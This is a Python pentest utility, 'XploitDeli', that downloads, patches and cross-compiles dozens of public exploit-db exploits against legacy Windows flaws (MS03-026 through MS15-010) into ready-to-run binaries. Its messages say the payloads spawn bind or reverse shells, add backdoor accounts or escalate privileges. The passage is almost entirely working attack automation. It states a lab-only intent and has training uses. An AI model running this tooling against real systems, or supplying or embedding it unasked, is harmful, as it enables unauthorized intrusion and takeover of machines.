#!/usr/bin/python

###################################################
#
#   XploitDeli - written by Justin Ohneiser
# ------------------------------------------------
# This program produces a variety of exploits
# found on exploit-db for immediate use.
#
# Note: options with an asterisk either don't work
# or require compilation on the target.
#
# [Warning]:
# This script comes as-is with no promise of functionality or accuracy.  I strictly wrote it for personal use.
# I have no plans to maintain updates, I did not write it to be efficient, and in some cases you may find the
# functions may not produce the desired results, so use at your own risk/discretion. I wrote this script to
# target machines in a lab environment so please only use it against systems for which you have permission!!
#-------------------------------------------------------------------------------------------------------------
# [Modification, Distribution, and Attribution]:
# You are free to modify and/or distribute this script as you wish.  I only ask that you maintain original
# author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
# worth anything anyway :)
#
# Designed for use in Kali Linux 4.6.0-kali1-686
###################################################

import sys, os, subprocess

# ------------------------------------
# WINDOWS REMOTE
# ------------------------------------

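def windows_exploit_suggester():
  """Fetch the Windows-Exploit-Suggester archive and stage windows-exploit-suggester.py.

  Steps are (label, shell command) pairs handed to run(): the zip is
  downloaded (no integrity check), unpacked, the script copied into the
  working directory and invoked with -u, then the archive is removed.
  The usage hint is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/GDSSecurity/Windows-Exploit-Suggester/archive/master.zip'),
    # Label corrected: the original read 'Upacking...'.
    ('Unpacking...', 'unzip master.zip; cp Windows-Exploit-Suggester-master/windows-exploit-suggester.py .'),
    ('Updating...', './windows-exploit-suggester.py -u'),
    ('Cleaning up...', 'rm master.zip; rm -r Windows-Exploit-Suggester-master'),
  ]
  if not run(steps):
    return
  printGood("windows-exploit-suggester.py successfully created\n\tUsage: ./windows-exploit-suggester.py -d <database file> -o <os description> [--remote | --local]")
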
def ms03_026():
  """Fetch exploit-db entry 100 and cross-compile it to ms03-026.exe.

  Steps are (label, shell command) pairs handed to run(); the source is
  used as downloaded, with no integrity check. The summary is printed
  only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/100 -O ms03-026.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms03-026.c -o ms03-026.exe -lws2_32'),
    ('Cleaning up...', 'rm ms03-026.c'),
  ]
  if not run(steps):
    return
  printGood("ms03-026.exe successfully created\n\t - creates user 'e' and pass 'asd#321'")

def ms03_039_1():
  """Fetch exploit-db entry 103 and cross-compile it to ms03-039.exe.

  Steps are (label, shell command) pairs handed to run(); no integrity
  check is made on the download. The summary is printed only when run()
  returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/103 -O ms03-039.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms03-039.c -o ms03-039.exe -lws2_32'),
    ('Cleaning up...', 'rm ms03-039.c'),
  ]
  if not run(steps):
    return
  printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")

def ms03_039_2():
  """Fetch exploit-db entry 109 (C++) and cross-compile it to ms03-039.exe.

  Same output name as ms03_039_1, so running both overwrites the earlier
  binary. Steps are (label, shell command) pairs handed to run(); the
  summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/109 -O ms03-039.cpp'),
    ('Compiling...', 'i686-w64-mingw32-g++ ms03-039.cpp -o ms03-039.exe -lws2_32'),
    ('Cleaning up...', 'rm ms03-039.cpp'),
  ]
  if not run(steps):
    return
  printGood("ms03-039.exe successfully created\n\t - creates user 'SST' and pass '557'")

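def ms03_049():
  """Fetch exploit-db entry 119 and cross-compile it to ms03-049.exe.

  Steps are (label, shell command) pairs handed to run(); the download is
  not integrity-checked. The summary is printed only when run() returns
  a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/119 -O ms03-049.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms03-049.c -o ms03-049.exe -lws2_32'),
    ('Cleaning up...', 'rm ms03-049.c'),
  ]
  if not run(steps):
    return
  # Message corrected: the original named ms03-039.exe although the
  # compile step above writes ms03-049.exe.
  printGood("ms03-049.exe successfully created\n\t - spawns bind shell on port 5555")
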
def ms04_007():
  """Fetch the exploit-db bin-sploit 3022 tarball and unpack kill-bill/kill-bill.pl.

  Steps are (label, shell command) pairs handed to run(); the tarball is
  extracted as-is (no integrity check) and then deleted. The summary is
  printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz -O ms04-007.tar.gz'),
    ('Unpacking...', 'tar xvzf ms04-007.tar.gz'),
    ('Cleaning up...', 'rm ms04-007.tar.gz'),
  ]
  if not run(steps):
    return
  printGood("kill-bill/kill-bill.pl successfully created\n\t - spawns and connects to bind shell on port 8721")

def ms04_011_sslbof():
  """Fetch exploit-db entry 275 and cross-compile it to ms04-011.exe.

  Uses the same file names as ms04_011_lsasarv, so the two overwrite each
  other. Steps are (label, shell command) pairs handed to run(); the
  summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/275 -O ms04-011.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
    ('Cleaning up...', 'rm ms04-011.c'),
  ]
  if not run(steps):
    return
  printGood("ms04-011.exe successfully created\n\t - spawns and connects reverse shell on port 443")

def ms04_011_lsasarv():
  """Fetch exploit-db entry 295 and cross-compile it to ms04-011.exe.

  Shares its file names with ms04_011_sslbof. Steps are (label, shell
  command) pairs handed to run(); the download is not integrity-checked.
  The summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/295 -O ms04-011.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -lws2_32'),
    ('Cleaning up...', 'rm ms04-011.c'),
  ]
  if not run(steps):
    return
  printGood("ms04-011.exe successfully created\n\t - spawns bind shell on given port")

def ms04_031():
  """Fetch exploit-db entry 734 and cross-compile it to ms04-031.exe.

  Steps are (label, shell command) pairs handed to run(); no integrity
  check is made on the download. The summary is printed only when run()
  returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/734 -O ms04-031.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms04-031.c -o ms04-031.exe -lws2_32'),
    ('Cleaning up...', 'rm ms04-031.c'),
  ]
  if not run(steps):
    return
  printGood("ms04-031.exe successfully created\n\t - spawns bind shell on given port")

def ms05_017():
  """Fetch exploit-db entry 1075 and cross-compile it to ms05-017.exe.

  Steps are (label, shell command) pairs handed to run(); the source is
  compiled as downloaded. The summary is printed only when run() returns
  a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/1075 -O ms05-017.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms05-017.c -o ms05-017.exe -lws2_32'),
    ('Cleaning up...', 'rm ms05-017.c'),
  ]
  if not run(steps):
    return
  printGood("ms05-017.exe successfully created\n\t - spawns bind shell on given port")

def ms05_039():
  """Fetch exploit-db entry 1149 and cross-compile it to ms05-039.exe.

  Steps are (label, shell command) pairs handed to run(); the download is
  not integrity-checked. The summary is printed only when run() returns
  a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/1149 -O ms05-039.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms05-039.c -o ms05-039.exe -lws2_32'),
    ('Cleaning up...', 'rm ms05-039.c'),
  ]
  if not run(steps):
    return
  printGood("ms05-039.exe successfully created\n\t - spawns bind shell on given port")

def ms06_040_1():
  """Fetch exploit-db entry 2223 and cross-compile it to ms06-040.exe.

  Same output name as ms06_040_2. Steps are (label, shell command) pairs
  handed to run(); the summary is printed only when run() returns a
  truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/2223 -O ms06-040.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
    ('Cleaning up...', 'rm ms06-040.c'),
  ]
  if not run(steps):
    return
  printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 54321")

def ms06_040_2():
  """Fetch exploit-db entry 2265, patch it with sed, and cross-compile to ms06-040.exe.

  The 'Fixing...' step rewrites the `WNetAddConnection2(...) != NO_ERROR`
  test into the constant-false `1==2`, so a failed connection attempt no
  longer aborts the build's logic — keep that in mind when the result
  misbehaves. Steps are (label, shell command) pairs handed to run(); the
  summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/2265 -O ms06-040.c'),
    ('Fixing...', "sed -i 's/WNetAddConnection2(&nr, \"\", \"\", 0) != NO_ERROR/1==2/g' ms06-040.c;"),
    ('Compiling...', 'i686-w64-mingw32-gcc ms06-040.c -o ms06-040.exe -lws2_32'),
    ('Cleaning up...', 'rm ms06-040.c'),
  ]
  if not run(steps):
    return
  printGood("ms06-040.exe successfully created\n\t - spawns bind shell on port 4444")

def ms06_070():
  """Fetch exploit-db entry 2789, patch its broken comment lines with sed, and build ms06-070.exe.

  The two sed edits close a dangling string and comment out a line that
  starts with 'see' so the source compiles under mingw. Steps are
  (label, shell command) pairs handed to run(); the summary is printed
  only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/2789 -O ms06-070.c'),
    ('Fixing...', "sed -i 's/more informations/more informations\");/g' ms06-070.c; sed -i 's/see/\/\/see/g' ms06-070.c"),
    ('Compiling...', 'i686-w64-mingw32-gcc ms06-070.c -o ms06-070.exe -lws2_32'),
    ('Cleaning up...', 'rm ms06-070.c'),
  ]
  if not run(steps):
    return
  printGood("ms06-070.exe successfully created\n\t - spawns bind shell on port 4444")

def ms08_067_1():
  """Fetch exploit-db entry 7104 and cross-compile it to ms08-067.exe.

  Same output name as ms08_067_3. Steps are (label, shell command) pairs
  handed to run(); the download is not integrity-checked. The summary is
  printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/7104 -O ms08-067.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms08-067.c -o ms08-067.exe -lws2_32'),
    ('Cleaning up...', 'rm ms08-067.c'),
  ]
  if not run(steps):
    return
  printGood("ms08-067.exe successfully created\n\t - spawns bind shell on port 4444")

def ms08_067_2():
  """Fetch exploit-db entry 7132 as ms08-067.py and mark it executable (mode 744).

  Steps are (label, shell command) pairs handed to run(); the script is
  used as downloaded. The summary is printed only when run() returns a
  truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/7132 -O ms08-067.py'),
    ('Preparing...', 'chmod 744 ms08-067.py'),
  ]
  if not run(steps):
    return
  printGood("ms08-067.py successfully created\n\t - spawns bind shell on 4444")

def ms08_067_3():
  """Fetch bin-sploit 6841 (rar), extract it into ms08-067/, and keep MS08-067.exe as ms08-067.exe.

  The prebuilt binary is taken as-is — nothing here verifies its origin
  or contents. Steps are (label, shell command) pairs handed to run();
  the summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6841.rar -O ms08-067.rar'),
    ('Unpacking...', 'mkdir ms08-067; cd ms08-067; unrar e ../ms08-067.rar'),
    ('Cleaning up...', 'rm ms08-067.rar; cp ms08-067/MS08-067.exe ms08-067.exe; rm -r ms08-067'),
  ]
  if not run(steps):
    return
  printGood("ms08-067.exe successfully created\n\t")

def ms09_050():
  """Fetch bin-sploit 14674, unpack it, and build smb2_exploit.exe inside smb2_exploit_release/smb2_exploit.

  Note the zip is removed before the compile step and the unpacked tree is
  left in place. Steps are (label, shell command) pairs handed to run();
  the summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14674.zip -O ms09-050.zip'),
    ('Unpacking...', 'unzip ms09-050.zip'),
    ('Cleaning up...', 'rm ms09-050.zip'),
    ('Compiling...', 'cd smb2_exploit_release/smb2_exploit; i686-w64-mingw32-g++ smb2_exploit.cpp -o smb2_exploit.exe -lws2_32'),
  ]
  if not run(steps):
    return
  printGood("/smb2_exploit_release/smb2_exploit/smb2_exploit.exe successfully created\n\t - spawns bind shell on 28876")

# Menu entries for the "windows remote" category: (display label, builder).
# A leading '*' on a label marks an entry the header flags as broken or as
# needing compilation on the target.
exploits_windows_remote = [
  ("windows_exploit_suggester", windows_exploit_suggester),
  ("ms03-026", ms03_026),
  ("ms03-039 (1)", ms03_039_1),
  ("ms03-039 (2)", ms03_039_2),
  ("*ms03-049", ms03_049),
  ("ms04-007", ms04_007),
  ("ms04-011 - ssl bof", ms04_011_sslbof),
  ("ms04-011 - lsasarv.dll", ms04_011_lsasarv),
  ("ms04-031", ms04_031),
  ("ms05-017", ms05_017),
  ("ms05-039", ms05_039),
  ("*ms06-040 (1)", ms06_040_1),
  ("ms06-040 (2)", ms06_040_2),
  ("ms06-070", ms06_070),
  ("*ms08-067 (1)", ms08_067_1),
  ("ms08-067 (2)", ms08_067_2),
  ("ms08-067 (3)", ms08_067_3),
  ("*ms09-050", ms09_050),
]

# ------------------------------------
# WINDOWS LOCAL
# ------------------------------------

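def windows_privesc_check():
  """Fetch the windows-privesc-check archive and stage windows-privesc-check2.exe.

  Steps are (label, shell command) pairs handed to run(): the zip is
  downloaded (no integrity check), the prebuilt exe copied out, and the
  archive and tree removed. The summary is printed only when run()
  returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/pentestmonkey/windows-privesc-check/archive/master.zip -O windows-privesc-check.zip'),
    # Label aligned with every other step in the file ('Unpacking...').
    ('Unpacking...', 'unzip windows-privesc-check.zip; cp windows-privesc-check-master/windows-privesc-check2.exe .'),
    ('Cleaning up...', 'rm windows-privesc-check.zip; rm -r windows-privesc-check-master'),
  ]
  if not run(steps):
    return
  printGood("windows-privesc-check2.exe successfully created")
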
def ms04_011_local():
  """Fetch exploit-db entry 271, lowercase its Winuser.h include, and build ms04-011.exe.

  Shares file names with the two remote ms04_011 builders. Steps are
  (label, shell command) pairs handed to run(); the summary is printed
  only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/271 -O ms04-011.c'),
    ('Fixing...', "sed -i 's/Winuser.h/winuser.h/g' ms04-011.c"),
    ('Compiling...', 'i686-w64-mingw32-gcc ms04-011.c -o ms04-011.exe -I/usr/i686-w64-mingw32/include/'),
    ('Cleaning up...', 'rm ms04-011.c'),
  ]
  if not run(steps):
    return
  printGood("ms04-011.exe successfully created\n\t")

def ms04_019_1():
  """Fetch exploit-db entry 350, comment out its stray prose lines with sed, and build ms04-019.exe.

  The sed chain closes an unterminated string and prefixes several
  free-text lines with '//' so the file compiles. Steps are (label, shell
  command) pairs handed to run(); the summary is printed only when run()
  returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/350 -O ms04-019.c'),
    ('Fixing...', "sed -i 's/Utility Manager and then/Utility Manager and then run\");/g' ms04-019.c; sed -i 's/run UtilManExploit2.exe/\/\/run UtilManExploit2.exe/g' ms04-019.c; sed -i 's/in the taskbar/\/\/in the taskbar/g' ms04-019.c; sed -i 's/lParam must be/\/\/lParam must be/g' ms04-019.c; sed -i 's/close open error window/\/\/close open error window/g' ms04-019.c; sed -i 's/close utility manager/\/\/close utility manager/g' ms04-019.c"),
    ('Compiling...', 'i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
    ('Cleaning up...', 'rm ms04-019.c'),
  ]
  if not run(steps):
    return
  printGood("ms04-019.exe successfully created\n\t - run 'utilman.exe /start', then execute")

def ms04_019_2():
  """Fetch exploit-db entry 352 and cross-compile it to ms04-019.exe.

  Same output name as the other ms04_019 builders. Steps are (label,
  shell command) pairs handed to run(); the summary is printed only when
  run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/352 -O ms04-019.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
    ('Cleaning up...', 'rm ms04-019.c'),
  ]
  if not run(steps):
    return
  printGood("ms04-019.exe successfully created\n\t")

def ms04_019_3():
  """Fetch exploit-db entry 355 and cross-compile it to ms04-019.exe.

  Steps are (label, shell command) pairs handed to run(); the download is
  not integrity-checked. The summary is printed only when run() returns
  a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/355 -O ms04-019.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms04-019.c -o ms04-019.exe -lws2_32'),
    ('Cleaning up...', 'rm ms04-019.c'),
  ]
  if not run(steps):
    return
  printGood("ms04-019.exe successfully created\n\t")

def ms04_020():
  """Fetch exploit-db entry 351, patch it for mingw with sed, and build ms04-020.exe.

  The sed chain lowercases the Winsock2.h include and comments out lines
  matching '_snprintf' and 'pax -h'. Steps are (label, shell command)
  pairs handed to run(); the summary is printed only when run() returns
  a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/351 -O ms04-020.c'),
    ('Fixing...', "sed -i 's/Winsock2.h/winsock2.h/g' ms04-020.c; sed -i 's/_snprintf/\/\/_snprintf/g' ms04-020.c; sed -i 's/pax -h/\/\/pax -h/g' ms04-020.c"),
    ('Compiling...', 'i686-w64-mingw32-gcc ms04-020.c -o ms04-020.exe -lws2_32'),
    ('Cleaning up...', 'rm ms04-020.c'),
  ]
  if not run(steps):
    return
  printGood("ms04-020.exe successfully created\n\t")

def keybd():
  """Fetch exploit-db entry 1197 and cross-compile it to keybd.exe.

  Steps are (label, shell command) pairs handed to run(); the download is
  compiled as-is. The usage hint is printed only when run() returns a
  truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/1197 -O keybd.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc keybd.c -o keybd.exe -lws2_32'),
    ('Cleaning up...', 'rm keybd.c'),
  ]
  if not run(steps):
    return
  printGood("keybd.exe successfully created\n\t - run 'runas /user:restrcited cmd.exe', 'tlist.exe | find \"explorer.exe\"' (get pid), then run keybd.exe <pid>")

def ms05_018():
  """Fetch exploit-db entry 1198 and cross-compile it to ms05-018.exe.

  The compile line passes 'advapi32.lib' as a bare argument rather than
  via -l; this entry is starred in the menu, so treat a link failure here
  as expected. Steps are (label, shell command) pairs handed to run();
  the summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/1198 -O ms05-018.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms05-018.c -o ms05-018.exe -lws2_32 advapi32.lib'),
    ('Cleaning up...', 'rm ms05-018.c'),
  ]
  if not run(steps):
    return
  printGood("ms05-018.exe successfully created\n\t")

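def ms05_055():
  """Fetch exploit-db entry 1407 and cross-compile it (as C++) to ms05-055.exe.

  Steps are (label, shell command) pairs handed to run(); the download is
  not integrity-checked. The summary is printed only when run() returns
  a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/1407 -O ms05-055.c'),
    ('Compiling...', 'i686-w64-mingw32-g++ ms05-055.c -o ms05-055.exe -lws2_32'),
    ('Cleaning up...', 'rm ms05-055.c'),
  ]
  if not run(steps):
    return
  # Message corrected: the original read 'successfuly'.
  printGood("ms05-055.exe successfully created\n\t")
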
def ms06_030():
  """Fetch exploit-db entry 1911 and cross-compile it to ms06-030.exe.

  Steps are (label, shell command) pairs handed to run(); the source is
  compiled as downloaded. The summary is printed only when run() returns
  a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/1911 -O ms06-030.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms06-030.c -o ms06-030.exe -lws2_32'),
    ('Cleaning up...', 'rm ms06-030.c'),
  ]
  if not run(steps):
    return
  printGood("ms06-030.exe successfully created\n\t")

def ms06_049():
  """Fetch exploit-db entry 2412 and cross-compile it to ms06-049.exe.

  Steps are (label, shell command) pairs handed to run(); no integrity
  check is made on the download. The summary is printed only when run()
  returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/2412 -O ms06-049.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms06-049.c -o ms06-049.exe -lws2_32'),
    ('Cleaning up...', 'rm ms06-049.c'),
  ]
  if not run(steps):
    return
  printGood("ms06-049.exe successfully created\n\t")

def spool():
  """Fetch exploit-db entry 3220, patch it with sed, and cross-compile to spool.exe.

  The sed edits lowercase the Winspool.h include and comment out lines
  matching 'EnumPrintersA'. Steps are (label, shell command) pairs handed
  to run(); the summary is printed only when run() returns a truthy
  value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/3220 -O spool.c'),
    ('Fixing...', "sed -i 's/Winspool.h/winspool.h/g' spool.c; sed -i 's/EnumPrintersA/\/\/EnumPrintersA/g' spool.c"),
    ('Compiling...', 'i686-w64-mingw32-gcc spool.c -o spool.exe'),
    ('Cleaning up...', 'rm spool.c'),
  ]
  if not run(steps):
    return
  printGood("spool.exe successfully created\n\t - spawns bindshell on port 51477")

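def ms08_025():
  """Fetch bin-sploit 5518, unpack it into ms08-025/, and build ms08-025.exe.

  The compile step runs inside ms08-025/ and writes the binary one level
  up; the zip and the unpacked tree are then removed. Steps are (label,
  shell command) pairs handed to run(); the summary is printed only when
  run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip -O ms08-025.zip'),
    ('Unpacking...', 'mkdir ms08-025; cd ms08-025;unzip ../ms08-025.zip'),
    ('Compiling...', 'cd ms08-025; i686-w64-mingw32-gcc ms08-25-exploit.cpp -o ../ms08-025.exe -lws2_32'),
    ('Cleaning up...', 'rm ms08-025.zip; rm -r ms08-025'),
  ]
  if not run(steps):
    return
  # Message corrected: the original said ms08_025.exe, but the compile
  # step writes ms08-025.exe.
  printGood("ms08-025.exe successfully created\n\t")
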
def netdde():
  """Fetch exploit-db entry 21923, comment out two prose lines with sed, and build netdde.exe.

  Steps are (label, shell command) pairs handed to run(); the download is
  not integrity-checked. The summary is printed only when run() returns
  a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/21923 -O netdde.c'),
    ('Fixing...', "sed -i 's/source:/\/\/source:/g' netdde.c; sed -i 's/The Winlogon/\/\/The Winlogon/g' netdde.c"),
    ('Compiling...', 'i686-w64-mingw32-gcc netdde.c -o netdde.exe'),
    ('Cleaning up...', 'rm netdde.c'),
  ]
  if not run(steps):
    return
  printGood("netdde.exe successfully created\n\t")

def ms10_015():
  """Fetch bin-sploit 11199, unpack KiTrap0D/, and keep vdmallowed.exe as ms10-015.exe.

  The prebuilt binary is used as-is with no verification of its origin.
  Steps are (label, shell command) pairs handed to run(); the summary is
  printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip -O ms10-015.zip'),
    ('Unpacking...', 'unzip ms10-015.zip; cp KiTrap0D/vdmallowed.exe ms10-015.exe'),
    ('Cleaning up...', 'rm ms10-015.zip; rm -r KiTrap0D'),
  ]
  if not run(steps):
    return
  printGood("ms10-015.exe successfully created\n\t")

def ms10_059():
  """Fetch bin-sploit 14610, unpack Chimichurri/, and build ms10-059.exe from Chimichurri.cpp.

  Steps are (label, shell command) pairs handed to run(); the zip and the
  unpacked tree are removed afterwards. The summary is printed only when
  run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14610.zip -O ms10-059.zip'),
    ('Unpacking...', 'unzip ms10-059.zip'),
    ('Compiling...', 'cd Chimichurri; i686-w64-mingw32-g++ Chimichurri.cpp -o ../ms10-059.exe -lws2_32'),
    ('Cleaning up...', 'rm ms10-059.zip; rm -r Chimichurri'),
  ]
  if not run(steps):
    return
  printGood("ms10-059.exe successfully created\n\t")

def ms10_092():
  """Fetch exploit-db entry 15589 as ms10-092.wsf; nothing is compiled.

  The single step is a (label, shell command) pair handed to run(); the
  usage hint is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/15589 -O ms10-092.wsf'),
  ]
  if not run(steps):
    return
  printGood("ms10-092.wsf successfully created\n\t - use 'cscript ms10-092.wsf' to execute")

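def ms11_080():
  """Fetch exploit-db entry 18176 and bundle it into ms11-080.exe with pyinstaller under wine.

  Relies on a wine prefix with C:\\Python27 and on /usr/share/pyinstaller;
  the dist/, build/ and .spec outputs are removed afterwards. Steps are
  (label, shell command) pairs handed to run(); the summary is printed
  only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/18176 -O ms11-080.py'),
    ('Converting...', 'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms11-080.py'),
    ('Cleaning up...', 'cp dist/ms11-080.exe ms11-080.exe; rm ms11-080.py; rm -r dist build ms11-080.spec'),
  ]
  if not run(steps):
    return
  # Message corrected: the original said ms11_080.exe, but the file that
  # is copied out of dist/ is ms11-080.exe.
  printGood("ms11-080.exe successfully created\n\t")
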
def ms14_040():
  """Fetch exploit-db entry 39525 and bundle it into ms14-040.exe with pyinstaller under wine.

  Needs the same wine/Python27/pyinstaller setup as ms11_080. Steps are
  (label, shell command) pairs handed to run(); the summary is printed
  only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/39525 -O ms14-040.py'),
    ('Converting...', 'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-040.py'),
    ('Cleaning up...', 'cp dist/ms14-040.exe ms14-040.exe; rm ms14-040.py; rm -r dist build ms14-040.spec'),
  ]
  if not run(steps):
    return
  printGood("ms14-040.exe successfully created")

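def ms14_058_1():
  """Fetch bin-sploit 39666, unpack it, and build ms14-058.exe from 39666/Exploit/Exploit/Exploit.cpp.

  Steps are (label, shell command) pairs handed to run(); the zip, the
  unpacked tree and the __MACOSX folder are removed afterwards. The
  summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip -O ms14-058.zip'),
    ('Unpacking...', 'unzip ms14-058.zip'),
    ('Compiling...', 'cd 39666/Exploit/Exploit; i686-w64-mingw32-g++ Exploit.cpp -o ../../../ms14-058.exe -lws2_32'),
    ('Cleaning up...', 'rm ms14-058.zip; rm -r 39666 __MACOSX'),
  ]
  if not run(steps):
    return
  # The original passed an empty string here, so a successful build
  # printed nothing; report the artefact like every other builder does.
  printGood("ms14-058.exe successfully created\n\t")
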
def ms14_058_2():
  """Fetch exploit-db entry 37064 and bundle it into ms14-058.exe with pyinstaller under wine.

  Same output name as ms14_058_1. Steps are (label, shell command) pairs
  handed to run(); the summary is printed only when run() returns a
  truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/37064 -O ms14-058.py'),
    ('Converting...', 'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-058.py'),
    ('Cleaning up...', 'cp dist/ms14-058.exe ms14-058.exe; rm ms14-058.py; rm -r dist build ms14-058.spec'),
  ]
  if not run(steps):
    return
  printGood("ms14-058.exe successfully created\n\t")

def ms14_070_1():
  """Fetch exploit-db entry 37755 and cross-compile it to ms14-070.exe.

  Steps are (label, shell command) pairs handed to run(); the download is
  not integrity-checked. The summary is printed only when run() returns
  a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/37755 -O ms14-070.c'),
    ('Compiling...', 'i686-w64-mingw32-gcc ms14-070.c -o ms14-070.exe -lws2_32'),
    ('Cleaning up...', 'rm ms14-070.c'),
  ]
  if not run(steps):
    return
  printGood("ms14-070.exe successfully created\n\t")

def ms14_070_2():
  """Fetch exploit-db entry 35936 as ms14-070.py and echo the pyinstaller command to finish it by hand.

  Unlike the other builders nothing is compiled here and no summary is
  printed; the second step only echoes the wine/pyinstaller invocation
  for the user to run after manual fixes. run()'s result is ignored.
  """
  run([
    ('Downloading...', 'wget https://www.exploit-db.com/download/35936 -O ms14-070.py'),
    ('Note: requires manual fixing, then execute the following command:', 'echo \'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-070.py\''),
  ])

def ms15_010_1():
  """Fetch bin-sploit 39035, lowercase two header includes in 39035/main.cpp, and build ms15-010.exe.

  Note the archive is saved as ms15_010.zip (underscore) while the binary
  is ms15-010.exe. Steps are (label, shell command) pairs handed to
  run(); the summary is printed only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip -O ms15_010.zip'),
    ('Unpacking...', 'unzip ms15_010.zip'),
    ('Fixing...', "cd 39035; sed -i 's/Strsafe.h/strsafe.h/g' main.cpp; sed -i 's/Shlwapi.h/shlwapi.h/g' main.cpp"),
    ('Compiling...', 'cd 39035; i686-w64-mingw32-g++ main.cpp -o ../ms15-010.exe'),
    ('Cleaning up...', 'rm ms15_010.zip; rm -r 39035'),
  ]
  if not run(steps):
    return
  printGood("ms15-010.exe successfully created\n\t")

def ms15_010_2():
  """Fetch exploit-db entry 37098 and split it at fixed line offsets into ex.cpp/ex.h before building ms15-010.exe.

  The head/tail split (287 and 59 lines) is brittle: it silently
  produces garbage if the upstream file changes length. Only the original
  download is removed — ex.cpp and ex.h are left behind. Steps are
  (label, shell command) pairs handed to run(); the summary is printed
  only when run() returns a truthy value.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/37098 -O ms15-010.cpp'),
